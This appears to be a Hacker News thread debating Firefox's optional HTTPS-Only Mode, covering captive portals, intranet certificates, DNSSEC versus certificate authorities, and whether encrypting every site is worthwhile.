This is exactly the https mode.


I don't think so. My proposed change only affects manually entered urls without protocol/schema. HTTP urls (entered manually or from links) would still work as expected, while https mode blocks them. I believe this change is small enough that they can make it the default, while http mode will likely remain optional for several years.


They can't make it the default yet without breaking a lot of things, since a bunch of marketing people decided to break the security properties of TLS by using HTTP-only vanity redirect domains. While I've found HTTP-only to be most common, sometimes these redirects do support HTTPS but hand out the main site's certificate without updating it to include the vanity domain, resulting in a certificate error (however, this new built-in HTTPS-only mode gives you an HTTP warning in this case rather than a certificate error, unlike HTTPS Everywhere's EASE). Some sites also have an HTTP-only redirect from example.com to www.example.com.


The difference is what happens if you type http manually.


Or click on an http:// link


I tried out the "HTTPS Everywhere" Firefox extension but found it caused me more trouble than it was worth, then found "HTTPS By Default" which suits my use much better. It automatically upgrades all awesomebar requests to https:// by default; one can manually use http:// to bypass it.


That would break tons of intranet applications for many enterprises.


I hope they aren't going to force users into https-only in the future. Software shouldn't cut off legacy content (old websites that aren't going to be upgraded to https) just because in theory it is more secure. If someone is surfing the web as an adult, he is responsible for himself. Other than this, there are historical components (web firewalls) that aren't going to work anymore... so security becomes a matter in which someone else has an interest (certificate sellers?)


Because browsers run code, they exist in that tricky space where some design decisions have to be made for the good of the commons.

If you visit an HTTP site and get MITM'd, it's not just that the attacker can put you at risk by spoofing a credential input box; it's that the attacker can put third parties at risk by having your browser XMLHttpRequest as fast as it can at someone else's site to try and DDOS them.

At that point, the calculus shifts and we see a world where user-agent engineers have to make decisions like Microsoft did (to start forcing people to install security patches to the most popular OS on the planet, because we have enough evidence from human behavior to know that at some point, forcing-via-inconvenience becomes necessary).

HTTP is fundamentally broken in that it can be abused to damage the network itself, and even though it's a deeply entrenched protocol, it's one that people have to be backing towards the exits on for that reason.


I think your comment gets specific, but I was talking generally. I don't really understand if you are arguing against my opinion... I don't know what to respond... bye


The feature has an allow-list so you can configure your sites the way you want.


yes, my statement was "i hope they aren't going to force this for everyone in the future"


Hot take: HTTPS-only mode is a bad idea if it is not paired with first-class support for self-signed certificates authorized using DANE+DNSSec. It just forces everyone to use broken/redundant CA model.


Can you articulate precisely the problem you believe this will solve? From my perspective it seems like it’s just making the system more fragile and harder to fix since DNSSEC requires OS updates to improve, while not meaningfully preventing state-level attacks.


The current number of CAs does not prevent state-level attacks either.

DNSSEC works I don’t really get that point.

The “root of trust” problem is hard to solve. I kinda hear the DANE guys’ argument, I’d rather trust one authority than a thousand.


> The current number of CAs does not prevent state-level attacks either.

Right, so the question is why we should put a huge amount of effort into implementing and operating a system which doesn't make significant improvements.

> DNSSEC works I don’t really get that point.

It's mostly a layering question: if a new cryptographic algorithm is released or a problem with an old one comes out, browsers can update very quickly. Updating the operating systems and network hardware which implement DNSSEC takes considerably longer. DNSSEC lingered on 90s crypto for ages, key rotations were put off for years, etc. because everyone in this space has to be extremely conservative. That has security implications as well as delaying most attempts to improve performance or usability.

Similarly, browsers can have extensive UI and custom validation logic for HTTPS. A lot of that information isn't present if you use DNSSEC without implementing your own resolver, so you get generic error messages and you don't get control over the policies set by your network administrator. This is especially interesting both as a risk if you don't trust your ISP or for dealing with compromises — if I compromise your DNS server and publish DNSSEC records with a long TTL, your users are at risk until you can get every ISP with a copy to purge the cached records ahead of schedule.

All of those issues can be improved but it's not clear that there's enough benefit to be worthwhile.

> The “root of trust” problem is hard to solve. I kinda hear the DANE guys’ argument, I’d rather trust one authority than a thousand.

This is the best argument for DNSSEC but it's not clear to me how much difference it makes in practice when you're comparing the still nascent DNSSEC adoption to modern TLS + certificate transparency which also catches spoofing and is far more widely implemented.


Kinda off-topic, but I wonder if the adoption of DNS-over-HTTPS will eventually solve the ossification problem you're referring to by moving DNS resolution to the application level.


It can definitely help since you're removing the network operator from the critical path. Large enterprises and ISPs are, not without reason, very conservative about breaking legacy clients but a browser vendor only has to worry about their own software in the release they ship DoH in (with some caveats they've addressed about internal split-view DNS, etc.) so they don't have to deal with complaints if, say, including an extra header breaks 5% of old IoT devices which haven't had an update in a decade.


You can't pair a capability of the web server with a client browser...


I think you haven't bothered to try this out:

- An error is presented only if the host offers HTTP _and_ HTTPS.
- There's a nice button to just skip it and view the plain HTTP page.


Finally! I've been waiting for HTTPS to be the default for a while now. From a security standpoint it's annoying that bar something like HSTS it's trivial for a man in the middle to force a downgrade to non-secure HTTP. The fix is to force yourself as a user to look for the lock symbol in the address bar, but that's terrible from a usability perspective.

However, I'm not sure whether it'd be best to make this the mode the default for everyone. I imagine regular users would be quite scared/confused when encountering such a message, and that might lead to lots of valuable (mostly older) websites still running plain HTTP to be effectively cut off.


The real and true bothersome part, is that Firefox (and others) do not seem to allow permanent exceptions.

Going through multiple prompts, each and every time someone wants to do what they want, is problematic.

I have gear on my LAN. No SSL, or self-signed, expired certs. I don't care. Ever. Why would I spent 10 seconds setting such things up? They're locked behind a firewall, (a secondary firewall), have no direct network access, and can't even be reached without port forwarding via SSH.

Yet, do you think I can tell my browser "never ever prompt for this again"? Nope. Nada.

I have zero issues with safer defaults, prompting when required. However, the idea that "Firefox knows best" is the sort of asinine behaviour that causes big tech issues all the time.

My point is, this is going to be annoying... not because of the feature, but instead, if I enable it, I'll be cut off from legacy sites by a wall of forever "Do you want to really do this?" with likely 10 clicks of 'yes' and 'ok' and 'i understand', combined with never storing this as a default.


That's why it's important for features like this to be enabled in at least a couple of major browsers at roughly the same time. That way, users will blame the website operator instead of the browser when they suddenly can't access an insecure website.


I wonder how it will work against websites like http://neverssl.com (which helps me to log in to some wifi portals, HTTPS Everywhere shows the prompt for a temporary exception.)


An alternative I use is http://captive.apple.com (other OS vendors have their own). Which may have a higher chance of being detected by the portal (more likely to be white-listed) and triggering the prompt correctly.


Frustratingly it doesn’t always work that way - one I have seen that is just bizarre is Qantas inflight wifi. It actually allows captive.apple.com to bypass the captive portal, so your iPhone, iPad or Mac thinks it has internet access. So you try to navigate to a page or use an app and just hit HTTPS certificate errors! So you have to think of some other site that is only HTTP or get the information card and enter the address it tells you to log in!

It’s crazy, because somebody must have had to configure something to explicitly let that through (not understanding the purpose of it?) and it just completely breaks it! I’ve tried to leave feedback (there is a link from the portal page) that they’ve screwed it up but it hadn't been fixed the last flight I went on..


It might be forging responses from captive.apple.com and not actually sending those out to the internet. If you set up your own intercept that responds 'Success', iOS will assume it has internet as well.


Like the sibling post said, you're probably seeing certificate errors caused by the portal, not traffic being allowed to captive.apple.com.

With http, a captive portal system will intercept your connection and redirect you to the portal authentication page. Most modern devices deal with it automatically by checking those plain http urls when the network comes up. For example, I think the way it works on iOS is that when you connect to a WiFi network the OS tries to hit http://captive.apple.com which triggers the redirect and prompts you for authentication.

With https, there's no way to have a valid TLS certificate for a random site the user is connecting to (ex: captive.apple.com), so you get a TLS error if you're attempting to connect to an https site while the portal is trying to redirect you for authentication.


Perhaps they were told to make Apple stuff work without login, and just blindly whitelisted all known Apple host address ranges.



It will say "this website doesn't support https, do you want to connect anyway"


Just checked this yup.

If I go to https://neverssl.com/ I get a warning explaining that this site doesn't have a certificate for neverssl.com but only for Cloudfront (presumably where it's hosted)

But if I try to go to http://neverssl.com/ then I get the message explaining that the HTTPS site doesn't work, do I want the insecure HTTP one instead?


If I specify http://whatever.com in the address bar, or if I follow a link to http://whatever.com, I'd expect it to attempt to connect to port 80 on whatever.com, and not redirect to https unless the page responds with a Location header

If I type "whatever.com", I'm happy with it to try port 443 first

I'm not sure if a http/80 page should be at least HEADed to see if there's a redirect to https/443 before throwing up the "this is not secure"
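That check is cheap to do client-side; a rough Python sketch of the idea (the hostname is a placeholder):

    import http.client

    # HEAD the plain-HTTP side and see whether it advertises a redirect to
    # HTTPS, without following it.
    conn = http.client.HTTPConnection("example.com", 80, timeout=5)
    conn.request("HEAD", "/")
    resp = conn.getresponse()
    location = resp.getheader("Location", "")
    conn.close()

    if resp.status in (301, 302, 307, 308) and location.startswith("https://"):
        print("server redirects to HTTPS:", location)
    else:
        print("no HTTPS redirect advertised (status %d)" % resp.status)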


I can understand your use case, but I know a lot of people (often those who use computers infrequently) type out the full URL all the time. They don't know what HTTP or HTTPS is, they don't realise you can omit that part. They just want to access the website.

For those people, it makes sense that typing "http://" would take them to the "https://" site if available. Although they did specify HTTP, it isn't necessarily what they actually wanted.

I think the use case you describe (whilst valid) only applies to a relatively small pool of people. Most people don't really understand HTTP or HTTPS very well. They know it's part of the web address, and some know that "https://" is "secure", but that's about it.

I think it makes sense to direct people to the secure version of the site as much as possible, whilst of course providing a mechanism to switch to the HTTP version if necessary.


Most people type the address into google.

If the server says that the thing on port 80 is better served from port 443, then it can issue a 301 permanent redirect (and an HSTS header to make it stick). If the server offers different content on port 80 and port 443 then it can do so just fine.

The browser should not try to second guess my explicit instructions.
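For what it's worth, that server-side arrangement is tiny; a toy Python sketch (the origin name is made up), where the port-80 listener only ever answers with a permanent redirect and the HSTS header is left to the HTTPS side, since browsers ignore it over plain HTTP:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class RedirectToHTTPS(BaseHTTPRequestHandler):
        """Plain-HTTP listener whose only job is to point at the HTTPS origin."""

        def do_GET(self):
            self.send_response(301)  # permanent redirect
            self.send_header("Location", "https://example.com" + self.path)
            self.end_headers()

        do_HEAD = do_GET

    # The real site, served over TLS elsewhere, would add something like:
    #   Strict-Transport-Security: max-age=31536000
    HTTPServer(("", 8080), RedirectToHTTPS).serve_forever()  # port 80 in practice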


Many users don't know the difference between http and https, so if you're trying to get them redirected to a captive portal page it's a lot easier if the default is http.


That kind of sucks, because if a user misses the initial OS redirect for a captive portal login, the easiest way to get them back to the authentication page is to have them hit an http site. However, things like HSTS make that really hard to do without a site that does NOT use https, and defaulting to https is like having HSTS triggered on every site.

Having to tell them to click through a non-https warning is almost as bad as having to tell them to click through a TLS warning.


Captive Portals are the thing that sucks in this situation though.

If you offer "free" WiFi behind an annoying Captive Portal chances are I'll just use my 3G service if it works. Now, in my mind do you think I consider you offered me "free" WiFi? No, it was too annoying to use. So your competitor that didn't bother with a Captive Portal site and just posted their WiFi password on a chalkboard - they have free WiFi and you don't.


I'll have to remember that for next time I get "wireless on the train doesn't work, I get some security error" via SMS.

Last time I pointed them at one of my sub-domains that still serves plain HTTP to bring up the captive portal (which wasn't trying to charge for, or apparently even advertise, anything; the network just insisted you hit it at least once to be told "Hello!" and presumably have your MAC added to the whitelist for a time).

The name "neverssl" might confuse non-techies though. Maybe I'll register something like iswirelessbroken.com for doing the same thing.


Captive portals are not unique to wireless networks so if you are gonna register a new name you might wanna go with something more generic (like "isnetworkbroken.com" or something like that).


Firefox has its own such domain, detectportal.firefox.com, which would presumably be excluded. But otherwise, it looks like the user will just have to turn it off for these kinds of sites. Same goes for things like browsing APT update servers that don't use HTTPS by design.


Firefox by default tries to connect to http://detectportal.firefox.com/success.txt in order to detect captive portals.
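The probe is simple enough to reproduce yourself; roughly, in Python (the expected body for Firefox's probe URL is the literal text "success"):

    import urllib.request

    PROBE = "http://detectportal.firefox.com/success.txt"
    try:
        with urllib.request.urlopen(PROBE, timeout=5) as resp:
            intercepted = resp.status != 200 or resp.read().strip() != b"success"
    except OSError:
        intercepted = True  # no connectivity at all also counts

    print("captive portal (or no internet)" if intercepted else "direct internet access")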


It might be time to introduce a protocol that allows networks to display authentication prompts without needing to MITM HTTP connections.

It's not even hard, all that's needed is to add an "authentication URL" field to DHCP and IPv6 router advertisements.


https://tools.ietf.org/html/rfc8910 Captive-Portal Identification in DHCP and Router Advertisements (RAs)

Actually the future is ambient network access. But on the way there, the likely pathway is larger and larger federated network authentication. Most of the world's higher-education students/staff are enrolled in EduROAM, so it doesn't matter whether they're in a classroom in Tokyo or London: the federated system concludes they are a legitimate user somewhere and so they can connect here. In these federated systems there's no use for a "Captive portal", since it could not safely achieve federated authentication, so there isn't one.


Isn't it part of what "Hotspot 2.0" (https://en.wikipedia.org/wiki/Hotspot_%28Wi-Fi%29#Hotspot_2....) provides?

It certainly solves the login part, it might also solve the register part?


I personally access 10.0.0.1 and that works at numerous places with wifi portals. Especially useful when my device/browser doesn't automatically detect that there is a captive portal.


This feature is not enabled as default in Firefox 83.

To enable it, make sure you have Firefox 83 installed. Then go to about:preferences#privacy and scroll down to the section "HTTPS-Only Mode" and make your selection.


This is a great step, but I wish browsers would allow you to set domains that are considered to be secure origins in all cases. I have a decent intranet with transport security guaranteed by VPN, but because it isn't "HTTPS" I can't access tons of browser features.


Have a look at Let's Encrypt DNS challenge. I created a DNS wildcard certificate for a subdomain I own and use it for all my internal domains. A great way to get HTTPS on non-public networks.

HTTP over VPN is still weaker than HTTPS over VPN. For example HTTPS also handles authentication which HTTP doesn't. If you're outside of your VPN, a MitM could redirect you to http://my-internal-domain.example and resolve its DNS to an attacker's website. Your browser would not understand the difference between this and your actual website in your VPN. It would send all the site's cookies to the evil website, and if Service Workers[1] worked over HTTP, this would actually be a way to completely compromise an internal HTTP website. So it's important not to whitelist such HTTP sites as if they're secure.

[1] https://developer.mozilla.org/en-US/docs/Web/API/Service_Wor...


Deploying to a mix of internal devices, many of which lack the ability to easily allow automatic certificate renewal, is not trivial.


Put a reverse proxy in front of it.


This is generally the best way, as it allows you to use things like client certificates or some other form of authentication to enforce AAA, and reduce the requirement of using VPN (which itself increases the security as it reduces the number of holes in your network)

Of course it's still insecure from your proxy to the device, but that's a more manageable risk


Also note that with the DNS-01 challenge you can add multiple wildcard domains under one certificate. There is a limit on the total number of domains in a certificate, but I still find it interesting and helpful.


In Chrome/Chromium-based browsers, you do exactly that here: chrome://flags/#unsafely-treat-insecure-origin-as-secure


According to [1] you can disable this for individual sites.

[1] https://news.ycombinator.com/item?id=25121929


I've set up an internal CA using minica [0] and trusted that CA in Chrome and Firefox with success. Each host got its own key, and I'm not even using a proper DNS server - I use Avahi, so all of my hosts are available as somehostname.local on all clients with Avahi/Bonjour installed.

[0] https://github.com/jsha/minica


Isn't this what HSTS does? Maybe a way to manually add domains to the list would be good.


I think GP is asking for a whitelist of HTTP-only domains the browser should consider safe.


HTTPS guarantees a higher level of security than "intranet", it works against on-path adversaries and provides end-to-end confidentiality & integrity & authenticity, plus provides forward security.


This is an important point: Modern TLS is often better crypto than most commonly deployed VPNs.


As a developer I likely won't use this feature much, considering most of our internal development sites are http only. For the general public it might be useful though, especially the auto-upgrade feature, protecting them from the lazy network operators that didn't add a proper auto-redirect.


According to another comment, you can still allow certain sites through http, so your internal dev sites are still fine but the global sites will be blocked by default


Sure, but we have like 50 different internal domains for different customers, so that would get annoying real fast ;)


I haven't tried out the release UX yet, but if it is just a couple of clicks inline when you first visit, this doesn't sound that bad. I would go through it for the added feeling of privacy and security whenever I am on a public connection.


Well, you have to specifically enable this feature. So don't enable it.


For now. These features tend to migrate from being optional to being default to being default and hard to turn off


Which indeed is why I said I likely will not use the feature above.


You could use a self signed certificate.


> As a developer … most of our internal development sites are http only.

As a developer, should you not work against an environment closer to production behaviours? Otherwise you might miss performance issues (due to different caching behaviours between http/https) or other problems until your code is released.


Its not always the code you work on. It might be other internal services or sites.


All our internal services are HTTPS. Then if a new hack is found to weaken wireless protocols we have that extra line of protection. Security in depth.

We serve strongly regulated industries and are subject to in-depth audits by clients on occasion, so perhaps my level of paranoia would be less warranted elsewhere. I'd still HTTPS everything though, even if the potential payoff is small because the required effort is too.


Public certificates? Do you use wildcards, or are you unconcerned about leaking information like server names via CT?


Public wildcard cert for centrally managed things.

Of course only a trusted few have access to the private parts of the certificate that covers centrally managed things. For local dev instances I suggest having a local-only meaningless domain and a wildcard off that.

If we were using per name certs and name leaking were a significant issue we could instead sign with a local CA and push the signing cert out as trusted to all machines we manage.



I've used this for a few months now. It upgrades non-https connections on secure pages automatically. Very useful. Even big sites like Microsoft and Google Images serve things over http

dom.security.https_only_mode = true


Thanks for mentioning this! This about:config flag is also available in Firefox ESR 78 already (but there is no GUI for it yet).


Are there about:config entries to handle excluded sites?


I was interested in this as well. Unfortunately, excluded sites are configured using PermissionManager <https://bugzilla.mozilla.org/1640853> which stores data in permissions.sqlite.


It seems no / I could not find any.


I tried this but I ran into a lot of issues so I just turned it off again.

For example: Twitter would periodically refuse to load. You'd have to force refresh Twitter for it to load once again.


The twitter problem is not related to this. Even I get it with this tweak disabled. It's definitely some other about:config tweak we have enabled.


I do worry about the sort of monoculture with Let's Encrypt. A second and third provider that do the same thing would reduce the blast radius for potential outages. Grateful for LE, but there's a lot riding on it. Similar for Cloudflare.


I see at least two other ACME based Free CA services:

https://www.buypass.com/ssl/products/acme This one appears fully drop-in compatible with LE, except that it does not offer wildcards.

https://zerossl.com/ Does offer wildcards, but slightly less compatible, because you need to sign up with a web form, and provide your credentials via the optional ACME EAB feature (External Account Binding), so not all tooling will support it.


Yes: if LE goes boom for some reason, there's at most 30 days to get a working replacement online before server certificates start failing.

I'll try to keep my tin hat stored.


Or just a day, if people wait till the deadline


I'm for this. Any computer capable of running FF83 is powerful enough to use HTTPS everywhere.

What it doesn't do, is force good TLS - there's nothing to stop a site using a weak algorithm, SSLv2/3, or old TLS versions.

It also wrecks network-level caching using appliances like Squid.
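If you want to check what a particular site actually negotiates (the weak-TLS point above), a small Python sketch (the hostname is a placeholder):

    import socket, ssl

    HOST = "example.com"  # placeholder
    ctx = ssl.create_default_context()  # modern defaults; refuses SSLv2/3 and other legacy protocols
    with socket.create_connection((HOST, 443), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
            print("protocol:", tls.version())  # e.g. 'TLSv1.3'
            print("cipher  :", tls.cipher())   # (name, protocol, secret bits)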


> What it doesn't do, is force good TLS - there's nothing to stop a site using a weak algorithm, SSLv2/3, or old TLS versions.

TLS 1.0 and 1.1 were disabled in Firefox 78 in June.


That's good news. I know there was some flip-flopping over this because of covid and gov sites requiring old encryption. Great to hear that it's now done with.


Once this sort of thing is widely accepted, we'll see various blogs and websites silenced by having a certificate revoked. Not right away but soon enough.

It's a very exciting development. It's managed to use the geek "Everything has to be like this!" fanaticism to drag in a mechanism of control.

I wonder which of the Four Horsemen it will be used against first.


There's a ton of trusted roots across multiple countries. I think the odds are virtually nil that none of them would let you have a certificate.


Certain governments already require their root be the only one trusted by software in their country.


Which governments and which software?


"When Firefox autocompletes the URL of one of your search engines, you can now search with that engine directly in the address bar by selecting the shortcut in the address bar results."

This is what I've been missing from chrome!


Oh wow, this is huge! Ever since switching back to FF, I constantly forget what my "shorthand" shortcut is for my custom search engines.


Judging from the comments here, they really should've added the word "optional" in the title.


“Mode” means “a way that it can operate”.


"optional mode" problem solved.


“HTTPS-Only Optional Mode” reads terribly and is much more subject to confusion than “HTTPS-Only Mode” was.


It is optional for now, but as they say at the end the intent is to eventually always require HTTPS.


HTTPS is brittle.

HTTP is insecure, but will run forever.

This move will literally kill the old web.


One more reason to move to gopher:// and gemini://


gemini didn't ring any bell for me, for those like me,

https://gemini.circumlunar.space/docs/faq.html


I would hope you could expand on this a bit?


Not OP but:

HTTPS is not secure because it is centralized and it does not protect against MITM.

HTTP is the foundation of our civilization; it will never go away, no matter how much certificate sellers try.

But I would go one step further and point out that HTTP can be made secure manually and selectively, so that you only secure the things that need security!

HTTPS wastes energy by encrypting cat pictures, and we don't have that much cheap energy left!

But don't worry this will not kill HTTP only Mozilla/Chrome. Chromium will always allow adblockers for free and HTTP, because if they remove it, I'll fork it and add it back in, even if it takes 1 day to compile!


To me, HTTP is the wrong target. It would be much more interesting to replace IP, like Yggdrasil does (and I think gnunet, cjdns, hyperboria & others).

If your IP is a cryptographic identifier:

* It cannot be forged

* Anyone can generate a new one on-demand

* Every packet is authenticated, every packet can be encrypted

* TLS becomes redundant

However, the DNS part remains a hard one. How do you securely link to websites you have never seen? Pet names seem like a way to do so. Asking users to type IP addresses isn't really an answer, I think, but I don't know if there are a lot of "basic" users who type URLs in nowadays; they all seem to rely on Google providing the right website anyway, or the web browser itself.

It's not like DNS is also our single source of trust nowadays, but at least certificate providers are competent enough to make sure names are resolved correctly.

One option would be to make signed DNS records over a DHT: the root authority "." signs "com", "net", etc, that sign "ycombinator", etc. Publish to DHT, hash-indexed.
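To make that signing chain concrete, a toy sketch using Ed25519 from the Python cryptography package; the record format, names and address here are made up purely for illustration:

    from cryptography.hazmat.primitives.asymmetric.ed25519 import (
        Ed25519PrivateKey, Ed25519PublicKey)
    from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

    root = Ed25519PrivateKey.generate()  # the "." authority
    com = Ed25519PrivateKey.generate()   # the "com" authority

    # "." signs a delegation naming com's public key...
    com_pub = com.public_key().public_bytes(Encoding.Raw, PublicFormat.Raw)
    delegation = b"com " + com_pub
    delegation_sig = root.sign(delegation)

    # ...and "com" signs an individual record.
    record = b"ycombinator.com. A 192.0.2.1"  # placeholder address
    record_sig = com.sign(record)

    # A resolver that trusts only the root key can verify the whole chain,
    # no matter where the signed blobs were fetched from (e.g. a hash-indexed DHT).
    root.public_key().verify(delegation_sig, delegation)  # raises InvalidSignature if forged
    Ed25519PublicKey.from_public_bytes(com_pub).verify(record_sig, record)
    print("chain verifies")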

Of course, point-to-point connections have their weaknesses as well, it might be interesting to migrate to something like beaker browser (html on top of hypercore, formerly DAT, kind of like mutable torrents in a DHT). At the end of the day, the core issue is: migrating users is difficult if the benefits are not immediately obvious.

And yes, massively adopting anything else would literally "kill the old web", in the protocol sense. In the community or content sense? Not so sure.

https://yggdrasil-network.github.io/

https://gnunet.org/en/

https://github.com/cjdelisle/cjdns/

https://beakerbrowser.com/

https://hypercore-protocol.org/


IP is even harder to replace; it is completely fossilized by this point, and that is a feature. The challenge is not to replace the pipes but to build something meaningful using the pipes we have, without too much added complexity:

I built a realtime MMO stack using only HTTP/1.1 for networking.


You can always build a transition infrastructure on the top of IP, like https did by coexisting with http, and a bit like gemini does (it has https://gemini.circumlunar.space/ at least).

Then build some links without it, and have the compatibility layer the other way. If there are compelling reasons to use the new protocol, it might gain some traction. Maybe we'll turn off IP, but probably not within a century, unless some organization acquires a tremendous amount of control over the Internet.


I have been using HTTPS Everywhere for many years: https://www.eff.org/https-everywhere


Reading the docs (and my memory) HTTPS Everywhere works based on a predefined list of sites that should be upgraded.

The nice thing about the new Firefox feature is that the browser won't make any insecure connections unless I explicitly allow it.


Yes, but one less extension with access to all your history, passwords and all other info.


WebExtensions have permissions and I doubt the EFF requests passwords and history for this extension. It’s also open-source, and although installing it from addons.mozilla.org could introduce some sort of MITM opportunity, as a recommended extension Mozilla puts it through a review process, so it’s about as tame as an extension this capable can get. But yes, it is always nice to reduce extensions installed.


I have been using HTTPS Everywhere since forever. Here are the permissions required:

* Access browser tabs

* Access browser activity during navigation

* Access your data for all websites

So it could be pretty devastating if it went rogue, which I doubt will happen.


Passwords come under "Access your data for all websites", which HTTPS Everywhere needs.


I'm not sure if I trust EFF any less than I trust Mozilla.


I am the same but in this case it is about trusting (EFF and Mozilla) more than Mozilla. You have to trust Mozilla either way.


I already trust Mozilla with everything. I do everything on my browser. It is always better to reduce extensions. I look forward to a day when I have nothing but uBlock Origin in my browser


> In summary, HTTPS-Only Mode is the future of web browsing!

It has certainly seemed like HTTPS is the future of the web for the last few years. I love this HTTPS-Only mode and wish it would become the default (with better downgrades and messages for users who may not understand what it means). With the number of HTTP-only sites dwindling, this could result in a faster experience for sites that do not want to (or haven’t figured out how to) use HSTS or HSTS Preload (no redirects from HTTP to HTTPS) and for users who haven’t heard of the HTTPS Everywhere [1] extension.

[1]: https://www.eff.org/https-everywhere


There are a lot of confusing comments in here. Maybe I'm in the minority, but I use Chrome, which seems to convert to HTTPS by default on any site that supports it, and will provide visible warnings when the site doesn't support HTTPS.

Also man in the middle attacks seem massively overblown. If you are sitting at home on your private network, the likelihood of a man in the middle attack is stunningly small, such that it's completely irrelevant - especially in regards to the likely trivial content being viewed over http.


There's a phenomenon I observe quite regularly in tech. A problem exists and creative people develop an innovative solution to said problem. The solution then becomes popular and a singular goal of uncreative people who deploy said solution everywhere and push it to its logical extreme.

I remember seeing this in the mid-2000s when HTML tables were shunned in favour of "divs". I saw people reinventing tables using divs and CSS to display tabular data. Completely missing the point, of course.

This is an example of that for me. How can I possibly trust every single website I visit? It means nothing to connect to a news website, say, and see the "green padlock". Who am I trusting exactly? That I've successfully connected to some load balancer that is operated by "super-trustworthy-tech-news.com"? What's the use in that? Am I supposed to trust them more than some man-in-the-middle just because they own a domain name?

But maybe it's for privacy? If you want privacy you use tor. HTTPS does nothing for privacy when it's the same tech giant on the other end that is collecting all the data. It just means that said tech giant gets exclusive access to that data. Great.

All this does is train people to not care about security and to just trust us to do the right thing because they are too stupid to get it. Sooner or later there will be an event where a government compromises a CA. Bad luck. Some Americans already decided this was a solved problem and that this could never happen.


Couldn't agree more. Benefits of using HTTPS for most websites are doubtful, but the costs are real, in overhead and caching problems. We don't need the same level of security everywhere. (I'm not even sure we need that much "security" in general, but that's another topic.)

It's sad to see Firefox continuing to bother itself with solving non-problems while serious bugs go uncorrected for years.


HTTPS ensures the following things

1. You are talking to the domain that you think you are.

2. No one else can see the traffic in transit.

3. No one has modified the traffic.

It does not provide any guarantee around the trustworthiness of the domain itself. (Well EV Certs try but as far as I am concerned that is worthless.)

1 and 3 are not helpful in your example of "Am I supposed to trust them more than some man-in-the-middle" but it does help once you establish other trust in that domain. For example a friend sent you the link, or you start using the site regularly.

However, personally, even just 2 is a tangible benefit when I am using public connections. I very much like the idea that my browser will not send out any unencrypted data without my explicit approval.
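
To make point 1 concrete, this is roughly what happens under the hood; a small Python sketch (example.com is just a placeholder) where the default TLS setup refuses to finish the handshake unless the certificate chains to a trusted CA and matches the hostname you asked for:

    # Sketch: what "you are talking to the domain you think you are" means mechanically.
    import socket
    import ssl

    hostname = "example.com"  # placeholder
    context = ssl.create_default_context()  # loads system CAs, enables hostname checks

    with socket.create_connection((hostname, 443)) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            # A MITM without a valid certificate for this name makes the handshake
            # fail with ssl.SSLCertVerificationError instead of silently succeeding.
            print(tls.version(), tls.getpeercert()["subject"])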


> Am I supposed to trust them more than some man-in-the-middle just because they own a domain name?

You can be assured that you are actually talking to them. That's a big step up from not being able to do that.


Depends on the content of the website. A lot of websites wouldn't benefit at all from that assurance. A lot of blogs and random personal projects come to mind. My own blog does not care about authentication or MITM at all. It would be just an unnecessary complexity without any benefit.


It's not the websites that get that assurance. Maybe read up on it.


I do understand that.


> Am I supposed to trust them more than some man-in-the-middle just because they own a domain name?

The green padlock will not turn an unreliable fake news site of your choice into a trustworthy outlet, but it does make some guarantees about it being the same site as yesterday (barring security leaks or a missed DNS renewal).

AFAIU the elephant in the room is that if your DNS resolver is malicious and points all domains to a malicious IP, then HTTPS is completely useless.


> but it does make some guarantees about it being the same site as yesterday

No it doesn't. Are you thinking of TOFU via public key pinning?


I was oversimplifying my limited understanding. What I believe should be true is that you are connecting to a server that:

1. managed to obtain a valid certificate from some recognized authority

2. managed to steal a valid certificate for the domain in question from another server

3. managed to convince enough DNS resolvers to point to their IP for a given domain (so to get your traffic and/or pass LE challenges)

and/or other conditions. From an operational perspective it says very little, especially considering the third case, where any public wifi network in most cases has total initial control over your DNS traffic.


> if your DNS resolver is malicious and points all domains to a malicious IP then https is completely useless.

100% false. HTTPS absolutely protects against that.


Tables are better as well in the sense that they are a higher level representation than divs. The problem was that people were then using tables as a way to layout pages rather than to use them to display tabular data.


I think it goes deeper: the problem is that HTML tables are serialized in rows and columns separately, so, for example, if you wanted a cell to be 2 rows tall and 2 columns wide, there wasn't a local change that could achieve it.

To my understanding, CSS Grid is meant to solve this.


Yes there was: colspan.


Thanks for the correction; then my position is that, with rowspan and colspan, tables were sorta nice :)


Thank You!


This comment is why people make fun of HN.


What I don't understand is why there isn't a simple button when you land into a HTTP page to switch to HTTPS.

In the browser bar, to the left the address, you get an icon of a padlock, with a red slashed circle across it, and the word "Not secure".

Why can't you click on this to get a popup to switch to trying the HTTPS version of the URL?

You can click on it, but you just get a read-only tree of information about the site.

If you right click on it, you get a context menu popup about customizing the toolbar.


Because that’s a lot of hidden UI for something people rarely want to do (stay on an insecure version of a website while a secure version exists), that might not work anyway, and that they can still do relatively easily by typing ”s”.


The lot of hidden UI is already there; all it needs is one menu command.

There is UI for printing a page; I'm pretty sure I've changed a URL from HTTP to HTTPS more times than I've printed a web page.

> still do relatively easily by typing ”s”.

You have to position the cursor first; it's annoying.


A long time ago I suggested a new uri prefix - "secure://" - that would be a synonym for "HTTPS-only". If you visit a secure:// link, every single page load in the session would require strong encryption, secure cookies, etc.

The idea was to allow http if needed, and alternately allow strict https if needed, in a backwards compatible way (visiting a https:// url would work as before, but visiting secure:// would trigger the strict security for the rest of the session). This way you have the best of both worlds and the user (and server) get choice/agency.

The purpose was to stop MITM. The ability to MITM only requires blocking port 443 and letting the browser fall back to 80; this works even against HSTS because most people will just try other URLs until one works. So you need a way to avoid MITM at least for some specific requests. Banks, e-mail providers, etc would say "type in secure://mybank.com in your browser for strong security".

Another option was a "secure only" button on the browser. It seems they're moving towards this. They've buried it in preferences, which hopefully they'll change to the front UI. But I still think the secure:// links are easier for laypeople.
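
No browser implements this, of course, but as a rough sketch of the idea (everything here is hypothetical): the scheme rewrite is the trivial part, and the interesting part is refusing any cleartext fallback for the rest of the session.

    # Hypothetical sketch of the secure:// idea: rewrite to https and flag the
    # session as strict so no later request may fall back to plain http.
    from urllib.parse import urlsplit, urlunsplit

    class Session:
        def __init__(self):
            self.strict = False  # once True, http:// loads are refused, not downgraded

        def navigate(self, url: str) -> str:
            parts = urlsplit(url)
            if parts.scheme == "secure":
                self.strict = True
                return urlunsplit(("https",) + tuple(parts[1:]))
            if parts.scheme == "http" and self.strict:
                raise ValueError("strict session: refusing cleartext load of " + url)
            return url

    s = Session()
    print(s.navigate("secure://mybank.com/login"))    # -> https://mybank.com/login
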